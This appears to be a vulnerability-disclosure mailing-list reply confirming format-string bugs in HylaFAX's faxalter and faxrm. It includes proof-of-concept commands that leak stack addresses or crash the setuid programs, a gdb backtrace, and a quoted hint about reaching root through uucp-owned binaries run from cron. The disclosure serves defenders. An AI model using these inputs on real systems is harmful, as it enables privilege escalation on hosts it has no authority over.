Same deal on Mandrake 8.0... hylafax-client-4.1-5mdk.i586.rpm [root@linux /root]# cat /etc/redhat-release Linux Mandrake release 8.0 (Traktopel) for i586 [root@linux /root]# ls -al /usr/bin/faxalter -rwxr-xr-x 1 root root 13380 Aug 6 2001 /usr/bin/faxalter* [root@linux /root]# /usr/bin/faxalter -h %p,%p,%p,%p,%p,%p,%p -D 1 0x804a153,0x401b3290,0x1,0x8048364,0xbffff25c,(nil),0x40015b94: Unknown host [root@linux elguapo]# /usr/bin/faxalter -h %s,%s,%s -D 1 Segmentation fault (core dumped) [root@linux elguapo]# gdb /usr/bin/faxalter core (gdb) bt #0 0x40209ab7 in vfprintf () from /lib/libc.so.6 #1 0x4020d0f0 in vfprintf () from /lib/libc.so.6 #2 0x40207d7b in vfprintf () from /lib/libc.so.6 #3 0x40066509 in FaxClient::vprintError () from /usr/lib/libfaxutil.so.4.0.1 -KF > > There are some format strings vulnerbilities in the lastest hylafax package > try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept". > Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from > port collection). uid uucp is not that exciting but with some luck you'll > find uucp owned binaries running from cron with uid 0. > > -- > Sent through GMX FreeMail - http://www.gmx.net
